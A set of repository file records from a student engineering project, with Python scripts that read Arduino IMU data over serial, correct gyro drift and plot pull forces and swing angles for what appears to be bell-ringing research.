"content_id": "3420855fca94658d711191d1ef7450ac793a9e46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4697,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 117,
"path": "/scale.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\ndef despiker(data):\n #gather the data and put the columns into seperate variables\n times = data[:,0]\n masses = data[:,1]\n #shift the data down by 1 reading\n shifted = masses[0:-1]\n shifted = np.insert(shifted,0,masses[0])\n #find difference of data and shifted data to identify outliers\n spikes = abs(masses-shifted)\n # index the spikes\n indices = np.array(np.where(spikes>10)).transpose()\n # at each spike, replace the error by an interpolation. i+3 since some spikes are over 2 readings\n for i in indices:\n masses[i] = (masses[i-1] + masses[i+3])/2\n #concatenate the timestamps with the new smoothed mass data\n despiked = np.column_stack((times,masses))\n return despiked\ndef mass_to_force(despiked_data,standing_mass_start,standing_mass_end):\n standing_mass = np.mean(despiked_data[standing_mass_start:standing_mass_end,1])\n pull_force = standing_mass-despiked_data[:,1]\n return pull_force\n###-------------------------------------------------------------------------###\n###-------------------------------UNPACK DATA-------------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\n\nme_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 12:11:19 GSM/follow.csv'\nyangsheng_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 22:11:19 Benet/yangsheng.csv'\nsam_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 12:11:19 GSM/sam.csv'\narms_file = '/Users/shuowanghe/github/IIB-Project2/data/rawdata 19:11:19 GSM/arms.csv'\n\nme_data = genfromtxt(me_file,delimiter=',')\nyangsheng_data = genfromtxt(yangsheng_file,delimiter=',')\nsam_data = genfromtxt(sam_file,delimiter=',')\narms_data = genfromtxt(arms_file,delimiter=',')\n\nme_despiked_data = despiker(me_data)\nyangsheng_despiked_data = despiker(yangsheng_data)\nsam_despiked_data = despiker(sam_data)\narms_despiked_data = despiker(arms_data)\n\nme_timestamps,me_force = me_despiked_data[:,0],me_despiked_data[:,1]\nyangsheng_timestamps,yangsheng_force = yangsheng_despiked_data[:,0],yangsheng_despiked_data[:,1]\nsam_timestamps,sam_force = sam_despiked_data[:,0],sam_despiked_data[:,1]\narms_timestamps,arms_force = arms_despiked_data[:,0],arms_despiked_data[:,1]\n\nme_pull_force = mass_to_force(me_despiked_data,262,556)\nyangsheng_pull_force = mass_to_force(yangsheng_despiked_data,5780,7000)\nsam_pull_force = mass_to_force(sam_despiked_data,215,895)\narms_pull_force = mass_to_force(arms_despiked_data,307,563)\n\nme_smooth_pull_force = savgol_filter(me_pull_force,window_length=21,polyorder=3)*9.81\nyangsheng_smooth_pull_force = savgol_filter(yangsheng_pull_force,window_length=21,polyorder=3)*9.81\nsam_smooth_pull_force = savgol_filter(sam_pull_force,window_length=21,polyorder=3)*9.81\narms_smooth_pull_force = savgol_filter(arms_pull_force,window_length=21,polyorder=3)*9.81\n\nplt.plot(me_force)\nplt.title('me')\nplt.show()\n\nplt.plot(yangsheng_force)\nplt.title('yangsheng')\nplt.show()\n\nplt.plot(sam_force)\nplt.title('sam')\nplt.show()\n\nplt.plot(arms_force)\nplt.title('arms')\nplt.show()\n\n# plt.plot(me_data[:,0],me_pull_force)\nplt.plot(me_data[:,0],me_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Pull force (N)')\nplt.axis([81, 101, -100, 500])\nplt.show()\n\n# plt.plot(me_data[:,0],me_pull_force)\nplt.plot(yangsheng_data[:,0],yangsheng_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Pull force (N)')\nplt.axis([130, 150, -100, 500])\nplt.show()\n\n# plt.plot(sam_data[:,0],sam_pull_force)\nplt.plot(sam_data[:,0],sam_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Pull force (N)')\nplt.axis([68.5, 88.5, -100, 500])\nplt.show()\n\n# plt.plot(sam_data[:,0],sam_pull_force)\nplt.plot(arms_data[:,0],arms_smooth_pull_force)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Arm intertial force measured (N)')\nplt.axhline(y=0 , linestyle='--')\nplt.axis([7.5, 23, -300, 300])\nplt.show()\n"
},
{
"alpha_fraction": 0.6589061617851257,
"alphanum_fraction": 0.685218334197998,
"avg_line_length": 36.80729293823242,
"blob_id": "f2d32d7d956462e45b8cfa682e4fd4f60ad77541",
"content_id": "cda59146bec930f59f44480eaa4a61788dcf1806",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7259,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 192,
"path": "/COLE.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "# THIS CELL SHOULD ONLY NEED TO BE RUN ONCE, AT THE BEGINNING OF THE SESSION.\n\n# EDIT THESE LINES\n\ncomport='/dev/cu.usbmodem14101' # Enter the COM port number. Default is comport='COM4'\nwatermark='WordWord' # Enter the two 4-letter words provided to you by the demonstrator. Default is watermark='WordWord'\nuserids=['userid1','userid2'] # Enter list of lab group's userids; whoever is logged on should be listed first. Default is userids=['userid1','userid2']\ncarnumber=0 # Enter the car number (integer in the range 1-8). Default is carnumber=0\n\n# DO NOT CHANGE ANYTHING BELOW THIS LINE\n\n#\n# Import python packages\n#\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nimport serial\nimport time\nimport numpy as np\nfrom cobs import cobs\nfrom scipy import integrate\n\n#\n# Open the USB port into which the radio is plugged\n#\nprint('Wait a few seconds for serial port to open...')\ntry:\n ser = serial.Serial(comport, baudrate=57600)\n ser.isOpen() # try to open the port; will cause error if port is already open\nexcept IOError: # if the port is already open, close it and open it again\n ser.close()\n ser.open()\n\ntime.sleep(2) # pause for 2 seconds to allow port to settle down\nser.flush() # flush the port to remove any spurious data\nprint('Serial port open:',ser.name) # print name of port to confirm correct opening\n\n#\n# Define a function to read a line of data from the serial port.\n#\n# The arduino sends a line of data from the Arduino twenty times a second.\n# Each line contains: one measurement from each sensor; the time; and a checksum.\n# Each line is terminated by an end of line character.\ndef readmotiondata():\n eol = bytes([0]) # define the end of line character as a zero byte\n leneol = len(eol)\n motiond = bytearray() # set up an array of bytes\n while True:\n c = bytes(ser.read()) # read a byte from the serial port into variable c\n if c == eol:\n break # if the end of line character is read, return from the function with the bytes in motiond\n else:\n motiond += c # otherwise append the byte to the array\n return bytes(motiond)\n# Execute the readmotiondata function once to read the first (possibly incomplete) line of bytes and ignore it\nreadmotiondata()\n\n#\n# Initialise some variables\n#\nmotiondata=np.array([],dtype='uint16') # Initialise a numpy array of unsigned 16-bit (two byte) integers\naxlist=[] # initialise some python lists (lists are computationally more efficient than numpy arrays when we don't know the final size)\naylist=[]\nomegazlist=[]\ntlist=[]\ncounterlist=[]\n\n\n# DO NOT EDIT ANY OF THIS CELL\n\nprint('Wait up to 8 s for plot to appear...')\n\n# use 'magic' to allow matplotlib to work properly in the notebook\n# ensure this line is after the opening of the serial port\n# %matplotlib notebook\n\ntwidth=3 # length of time axis (plotting is slow and hence serial buffers fill up if time axis is too long)\n# check this is short enough by comparing real time with time on x-axis during plotting.\n\naxlist[:]=[] # empty the lists\naylist[:]=[]\nomegazlist[:]=[]\ntlist[:]=[]\ncounterlist[:]=[]\n\nfig=plt.figure(0,figsize=(9.5,6))\n\naxes1=plt.subplot(221) # cartesian plot\nline1, = axes1.plot(tlist, aylist, marker='o', markersize=3, color=\"red\")\n\naxes2=plt.subplot(222) # cartesian plot\nline2, = axes2.plot(tlist, counterlist, marker='o', markersize=3, color=\"green\")\n\naxes3=plt.subplot(223) # cartesian plot\nline3, = axes3.plot(tlist, counterlist, marker='o', markersize=3, color=\"blue\")\n\naxes4=plt.subplot(224) # cartesian plot\nline4, = axes4.plot(tlist, axlist, marker='o', markersize=3, color=\"orange\")\n\nline=[line1,line2,line3,line4] # list of line objects\n\nanim_running=False # boolean to indicate whether animation should be running or not\n\nfor x in range(150): # read sufficient number of lines from serial port to flush buffer before recording/plotting\n readmotiondata()\n\nprint('Press any key to start or stop recording/plotting (do not use the icons above)')\n\n#def onClick(event):\ndef press(event):\n global anim_running\n if anim_running:\n anim_running = False\n else:\n axlist[:]=[] # empty the lists before starting the recording/plotting\n aylist[:]=[]\n omegazlist[:]=[]\n tlist[:]=[]\n counterlist[:]=[]\n anim_running = True\n\ndef init():\n axes1.set_xlim(0,twidth)\n axes1.set_ylim(-1,1)\n axes1.set_ylabel(r'$a_y\\ /\\ \\rm{m \\ s^{-2}}$')\n axes2.set_xlim(0,twidth)\n axes2.set_ylim(-1,1)\n axes2.set_ylabel(r'$n$')\n axes3.set_xlim(0,twidth)\n axes3.set_ylim(-1,1)\n axes3.set_ylabel(r'$\\omega_z\\ /\\ \\rm{rad \\ s^{-1}}$')\n axes3.set_xlabel(r'time $t\\ /\\ \\rm{s}$')\n axes4.set_xlim(0,twidth)\n axes4.set_ylim(-1,1)\n axes4.set_ylabel(r'$a_x\\ /\\ \\rm{m \\ s^{-2}}$')\n axes4.set_xlabel(r'time $t\\ /\\ \\rm{s}$')\n axes1.set_title('Lateral acceleration')\n axes2.set_title('Wheel encoder count')\n axes3.set_title('Yaw velocity')\n axes4.set_title('Longitudinal acceleration')\n return line\n\ndef update(frame):\n motioncoded = readmotiondata() # serial read into bytes object converted to list of ints, last element is line feed\n try:\n motiondata = cobs.decode(motioncoded) #cobs\n except cobs.DecodeError:\n print('COBS DecodeError')\n else:\n motiondata = list(motiondata) # bytes object converted to list of ints, last element is line feed\n checksumrecvd=np.sum(motiondata[0:-1],dtype=np.uint8) # checksum\n if (checksumrecvd != motiondata[-1]):\n print('Checksum error')\n else:\n millis=np.uint32(motiondata[0] | motiondata[1]<<8 | motiondata[2]<<16 | motiondata[3]<<24)\n accx=np.int16(motiondata[4] | motiondata[5]<<8)\n accy=np.int16(motiondata[6] | motiondata[7]<<8)\n gyrz=np.int16(motiondata[20] | motiondata[21]<<8)\n encoder=np.int16(motiondata[22] | motiondata[23]<<8) # 22 = 4 time bytes + 18 imu bytes\n\n if anim_running:\n axlist.append(accx/100) # x acceleration, /100 to convert to m/s/s\n aylist.append(accy/100) # y acceleration, /100 to convert to m/s/s\n omegazlist.append(gyrz/900) # z velocity, /900 to convert to rad/s\n counterlist.append(encoder) # encoder count\n tlist.append(millis/1000) # time, /1000 to convert to s\n\n taxis=tlist-tlist[0] # adjust the time at the plot origin to zero\n tmin=max(taxis[0],taxis[-1]-twidth)\n tmax=max(taxis[0]+twidth,taxis[-1])\n axes1.set_xlim(tmin,tmax)\n axes1.set_ylim(min(aylist),max(aylist))\n axes2.set_xlim(tmin,tmax)\n axes2.set_ylim(min(counterlist)-1,max(counterlist)+1)\n axes3.set_xlim(tmin,tmax)\n axes3.set_ylim(min(omegazlist),max(omegazlist))\n axes4.set_xlim(tmin,tmax)\n axes4.set_ylim(min(axlist),max(axlist))\n line1.set_data(taxis,aylist)\n line2.set_data(taxis,counterlist)\n line3.set_data(taxis,omegazlist)\n line4.set_data(taxis,axlist)\n return line\n\nfig.canvas.mpl_connect('key_press_event', press)\n\nanimation = FuncAnimation(fig, update, init_func=init, interval=1, blit=False)\n# interval is in ms, set shorter than time step of data sent by Arduino,\n# so that update occurs as soon as data arrives from Arduino\n\nplt.show()\n"
},
{
"alpha_fraction": 0.7149614095687866,
"alphanum_fraction": 0.7313916087150574,
"avg_line_length": 54.79166793823242,
"blob_id": "e67e76acf39562e6b3ac81b593ad4d22c4da9911",
"content_id": "780393d82179a2f8116ef9ec790c7c90ef04effd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4019,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 72,
"path": "/drift_visualiser.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "#Imports\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\n\n#Gather and unpack data from CSV\nfile = '/Users/shuowanghe/github/IIB-Project2/data/adafruitapril15th/freeswing.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]*1.07\n#Smooth the radial acceleration signal\nfiltered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = scipy.signal.savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Get theta=0 time stamps from filtered radial acceleration signal\ntheta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n#Integrate gyro signal from first theta=0 to get angle vs time, but will drift\ntheta = scipy.integrate.cumtrapz(theta_dot[theta_zeros[0]:],timestamps[theta_zeros[0]:],initial=0)\n\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n timestamps = data[:,0] #unpack the data again, filter a_r and find theta=0s\n a_r = data[:,1]\n ang_vel = data[:,3]*1.07\n filtered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n theta = np.zeros(len(timestamps)) #generate empty array to hold theta\n for _ in theta_zeros: #hard re-integrate at every theta=0\n time_section = timestamps[_:]\n theta_dot_section = ang_vel[_:]\n theta[_:] = scipy.integrate.cumtrapz(theta_dot_section,time_section,initial=0)\n theta_int_once = scipy.integrate.cumtrapz(ang_vel[theta_zeros[0]:],timestamps[theta_zeros[0]:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[theta_zeros[0]:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = theta_zeros[0] #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = ang_vel[prev_zero:_+1]\n theta_section = scipy.integrate.cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the swing\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta,theta_fix #returns both the hard reintegrated theta and the drift-fixed theta\n\n#Plot to compare reintegrated theta vs once integrated theta\nplt.plot(timestamps,get_theta(data)[0],label=r'Re-zeroed $\\theta$',linewidth=5)\nplt.plot(timestamps,get_theta(data)[1],label=r'Re-zeroed and drift corrected $\\theta$',linewidth=3)\nplt.plot(timestamps[theta_zeros[0]:],theta,label=r'$\\theta$ integrated from 1st zero')\nplt.plot(timestamps[theta_zeros],np.zeros(len(theta_zeros)),'gx',label=r'$\\theta=0$')\nplt.legend(loc='lower right')\nplt.title(r'Comparison of $\\theta$ calculated from initial zero vs recalculated at every zero')\nplt.xlabel('time(s)')\nplt.ylabel(r'$\\theta$(rad)')\nplt.show()\n\n#Plot to show filtered radial acceleration to find all theta=0 time stamps\nplt.plot(timestamps,a_r,label=r'measured $a_r$')\nplt.plot(timestamps,filtered_a_r,label=r'measured $a_r$ with Savitzky–Golay filter')\nplt.plot(data[theta_zeros,0],filtered_a_r[theta_zeros],'x')\nplt.legend()\nplt.title(r'Filtered vs unfiltered $a_r$, used to find all $\\theta=0$')\nplt.xlabel('time(s)')\nplt.ylabel(r'$a_r$(m/$s^2$)')\nplt.show()\n"
},
{
"alpha_fraction": 0.6462264060974121,
"alphanum_fraction": 0.6725067496299744,
"avg_line_length": 29.91666603088379,
"blob_id": "71ce7a56dfa5f1ef852e59e41982331d8cb0e4e4",
"content_id": "9e2341553e88ca05a768596339538cf2e6ef1c3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1484,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 48,
"path": "/adafruit_plotter.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "from numpy import genfromtxt\nimport numpy as np\nimport scipy as sp\nfrom scipy.signal import find_peaks\nimport csv\nimport matplotlib.pyplot as plt\n\nfile = '/Users/shuowanghe/github/IIB-Project/test.csv'\ndata = genfromtxt(file, delimiter=',')\naxpeaks,_ = sp.signal.find_peaks(data[:,1],height=5,distance=50)\naypeaks,_ = sp.signal.find_peaks(data[:,2],height=0,distance=40)\ngzpeaks,_ = sp.signal.find_peaks(data[:,3],height=0,distance=50)\nzeros = min(aypeaks, key=lambda x:abs(x))\nprint(zeros)\n#plot 1 (x acceleration)\nplt.plot(data[:,0],data[:,1])\nplt.plot(data[axpeaks,0],data[axpeaks,1],\"x\")\nplt.xlabel('Time (s)')\nplt.ylabel('Normal Acceleration (m/s/s)')\nplt.show()\n#plot 2 (y acceleration)\nplt.plot(data[:,0],data[:,2])\nplt.plot(data[aypeaks,0],data[aypeaks,2],\"x\")\nplt.plot(data[zeros,0],data[zeros,2],\"x\",color='b')\nplt.xlabel('Time (s)')\nplt.ylabel('Tangential Acceleration (m/s/s)')\nplt.show()\n#plot 3 (z angular velocity)\nplt.plot(data[:,0],data[:,3])\nplt.plot(data[gzpeaks,0],data[gzpeaks,3],\"x\")\nplt.xlabel('Time (s)')\nplt.ylabel('Angular velocity (rad/s)')\nplt.show()\n#plot 4 (all plots)\nplt.plot(data[:,0],data[:,1])\nplt.plot(data[:,0],data[:,2])\nplt.plot(data[:,0],data[:,3])\nfor xc in axpeaks:\n xc = data[xc,0]\n plt.axvline(x=xc,color='b',linestyle='--')\n#for xc in aypeaks:\n #xc = data[xc,0]\n #plt.axvline(x=xc,color='r',linestyle='--')\nfor xc in gzpeaks:\n xc = data[xc,0]\n plt.axvline(x=xc,color='g',linestyle='--')\nplt.xlabel('Time (s)')\nplt.show()\n"
},
{
"alpha_fraction": 0.6632564067840576,
"alphanum_fraction": 0.6863300204277039,
"avg_line_length": 35.4603157043457,
"blob_id": "0ffcf2e332631350336110d924730a5d9c908528",
"content_id": "571cdc4a085f53bf20b8131fffa53fe597982fd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4594,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 126,
"path": "/adafruit.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "# THIS CELL SHOULD ONLY NEED TO BE RUN ONCE, AT THE BEGINNING OF THE SESSION.\n\n# EDIT THESE LINES\n\ncomport='/dev/cu.usbmodem14101' # Enter the COM port number. Default is comport='COM4'\nwatermark='WordWord' # Enter the two 4-letter words provided to you by the demonstrator. Default is watermark='WordWord'\nuserids=['userid1','userid2'] # Enter list of lab group's userids; whoever is logged on should be listed first. Default is userids=['userid1','userid2']\ncarnumber=0 # Enter the car number (integer in the range 1-8). Default is carnumber=0\n# DO NOT CHANGE ANYTHING BELOW THIS LINE\n\n#\n# Import python packages\n#\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nimport serial\nimport time\nimport numpy as np\nfrom numpy import genfromtxt\nimport csv\nfrom cobs import cobs\nfrom scipy import integrate\n\n#\n# Open the USB port into which the radio is plugged\n#\nprint('Wait a few seconds for serial port to open...')\ntry:\n ser = serial.Serial(comport, baudrate=57600)\n ser.isOpen() # try to open the port; will cause error if port is already open\nexcept IOError: # if the port is already open, close it and open it again\n ser.close()\n ser.open()\n\ntime.sleep(2) # pause for 2 seconds to allow port to settle down\nser.flush() # flush the port to remove any spurious data\nprint('Serial port open:',ser.name) # print name of port to confirm correct opening\n\n#\n# Define a function to read a line of data from the serial port.\n#\n# The arduino sends a line of data from the Arduino twenty times a second.\n# Each line contains: one measurement from each sensor; the time; and a checksum.\n# Each line is terminated by an end of line character.\ndef readmotiondata():\n eol = bytes([0]) # define the end of line character as a zero byte\n leneol = len(eol)\n motiond = bytearray() # set up an array of bytes\n while True:\n c = bytes(ser.read()) # read a byte from the serial port into variable c\n if c == eol:\n break # if the end of line character is read, return from the function with the bytes in motiond\n else:\n motiond += c # otherwise append the byte to the array\n return bytes(motiond)\n# Execute the readmotiondata function once to read the first (possibly incomplete) line of bytes and ignore it\nreadmotiondata()\n\n#\n# Initialise some variables\n#\nmotiondata=np.array([],dtype='uint16') # Initialise a numpy array of unsigned 16-bit (two byte) integers\naxlist=[] # initialise some python lists (lists are computationally more efficient than numpy arrays when we don't know the final size)\naylist=[]\nomegazlist=[]\ntlist=[]\ncounterlist=[]\n\n\naxlist[:]=[] # empty the lists\naylist[:]=[]\nomegazlist[:]=[]\ntlist[:]=[]\ncounterlist[:]=[]\n\nfor x in range(150): # read sufficient number of lines from serial port to flush buffer before recording/plotting\n readmotiondata()\n\n\ndef update():\n motioncoded = readmotiondata() # serial read into bytes object converted to list of ints, last element is line feed\n try:\n motiondata = cobs.decode(motioncoded) #cobs\n except cobs.DecodeError:\n print('COBS DecodeError')\n else:\n motiondata = list(motiondata) # bytes object converted to list of ints, last element is line feed\n checksumrecvd=np.sum(motiondata[0:-1],dtype=np.uint8) # checksum\n if (checksumrecvd != motiondata[-1]):\n print('Checksum error')\n else:\n millis=np.uint32(motiondata[0] | motiondata[1]<<8 | motiondata[2]<<16 | motiondata[3]<<24)\n accx=np.int16(motiondata[4] | motiondata[5]<<8)\n accy=np.int16(motiondata[6] | motiondata[7]<<8)\n gyrz=np.int16(motiondata[20] | motiondata[21]<<8)\n encoder=np.int16(motiondata[22] | motiondata[23]<<8) # 22 = 4 time bytes + 18 imu bytes\n\n return (millis, accx, accy, gyrz, encoder)\nsecs = 0\n\n\nfile = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/onesidepush4.csv'\n\nwhile secs<=60:\n (millis, accx, accy, gyrz, encoder) = update()\n secs = millis/1000\n accx = accx/100\n accy = accy/100\n gyrz = gyrz/900\n with open(file,'a',) as newFile:\n newFileWriter = csv.writer(newFile)\n newFileWriter.writerow([secs,accx,accy,gyrz])\n print('Elapsed Time:',\"%.2f\" % round(secs,2),'s, Ax:',\"%.2f\" % round(accx,2),'m/s/s, Ay:',\"%.2f\" % round(accy,2),'m/s/s, GyroZ:',\"%.2f\" % round(gyrz,2),'rad/s')\n\ndata = genfromtxt(file, delimiter=',')\nts = data[:,0]\nax = data[:,1]\nay = data[:,2]\ngz = data[:,3]\nplt.plot(ts,ax)\nplt.show()\nplt.plot(ts,ay)\nplt.show()\nplt.plot(ts,gz)\nplt.show()\n"
},
{
"alpha_fraction": 0.6189965009689331,
"alphanum_fraction": 0.6399248838424683,
"avg_line_length": 56.7829475402832,
"blob_id": "64fd0193413a6e69c3171f7802b104a946440f22",
"content_id": "62243e09b09e138330839ec1c8483ee19819756d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7454,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 129,
"path": "/visualisation_plots.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\nfrom matplotlib import animation\nfrom statsmodels.graphics import tsaplots\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n a_r = data[:,1]\n filtered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n #integrate theta and distribute drift before every zero\n theta_dot_correction_factor = 1.07\n timestamps = data[:,0]\n theta_dot = data[:,3]*theta_dot_correction_factor\n theta_int_once = scipy.integrate.cumtrapz(theta_dot[theta_zeros[0]:],timestamps[theta_zeros[0]:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[theta_zeros[0]:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = theta_zeros[0] #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = scipy.integrate.cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data\n x = np.sin(theta)[theta_zeros[0]:]\n y = scipy.signal.savgol_filter(np.gradient(data[:,3]*1.07,data[:,0]),window_length=25, polyorder=3)[theta_zeros[0]:]\n allowed_indices = np.where(abs(x)<0.2) #find indices where line is straight\n p = np.polyfit(x[allowed_indices],y[allowed_indices],deg=1) #fit a line through all of the data points within the cutoff\n plt.plot(x,y,'x') #plot all the data points\n plt.plot(x[allowed_indices],y[allowed_indices],'gx') #plot the allowed data points for fitting\n plt.plot(x,p[0]*x,'r') #plot the fitted line, through the origin\n plt.show()\n return p[0]\n\n###-------------------------------------------------------------------------###\n###----------------------------------DATA-----------------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nfile = '/Users/shuowanghe/github/IIB-Project2/data/adafruitapril15th/2sidepush.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]*1.07\n#Smooth the radial acceleration signal\nfiltered_a_r = scipy.signal.savgol_filter(a_r,window_length=21, polyorder=2)\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = scipy.signal.savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Get theta=0 time stamps from filtered radial acceleration signal\ntheta_zeros,_ = scipy.signal.find_peaks(filtered_a_r,prominence=5)\n\n#get the -mlg/J gradient from fitting the straight part of the graph\np = get_gradient(data)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(data)\n#Calculate some force quantity T/J\nforce = filtered_theta_double_dot[theta_zeros[0]:]-p*np.sin(theta[theta_zeros[0]:])\npeaks,_ = scipy.signal.find_peaks(abs(scipy.signal.savgol_filter(force,window_length=25, polyorder=3)),prominence=None)\n\n\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot bell angle against some force calculation\nforce = filtered_theta_double_dot[theta_zeros[0]:]-p*np.sin(theta[theta_zeros[0]:])\npeaks,_ = scipy.signal.find_peaks(abs(scipy.signal.savgol_filter(force,window_length=25, polyorder=3)),prominence=None)\ntsaplots.plot_acf(force,lags=2000)\nplt.show()\nplt.plot(timestamps[theta_zeros[0]:],force,label=\"Force measurement\")\n#plt.plot(timestamps[theta_zeros[0]:][peaks],scipy.signal.savgol_filter(force,window_length=25, polyorder=3)[peaks],'x')\nplt.plot(timestamps[theta_zeros[0]:],scipy.signal.savgol_filter(force,window_length=25, polyorder=3),label=\"Force measurement (Smoothed)\")\nplt.plot(timestamps[theta_zeros[0]:],theta[theta_zeros[0]:],label=r'$\\theta$')\nplt.plot(timestamps[theta_zeros[0]:],theta_dot[theta_zeros[0]:],label=r'$\\dot{\\theta}$')\n\n#plt.plot(timestamps[theta_zeros[0]:],filtered_theta_double_dot[theta_zeros[0]:])\n#plt.plot(timestamps[theta_zeros[0]:],p*np.sin(theta[theta_zeros[0]:]))\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.axhline(0,color='b',linestyle='--')\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.legend()\nplt.show()\nprint(-p)\nplt.plot(-p*np.sin(theta[theta_zeros[0]:]),force)\nplt.show()\n\n#Other plots for visualisation\n#plt.plot(timestamps,theta_dot,label='measured ang vel')\nplt.plot(timestamps,scipy.signal.savgol_filter(a_theta,window_length=21, polyorder=2),label='measured tangential acc')\n#plt.plot(timestamps,a_r,label='measured radial acc')\n#plt.plot(timestamps_trunc1[:-1],theta1,label='theta (from 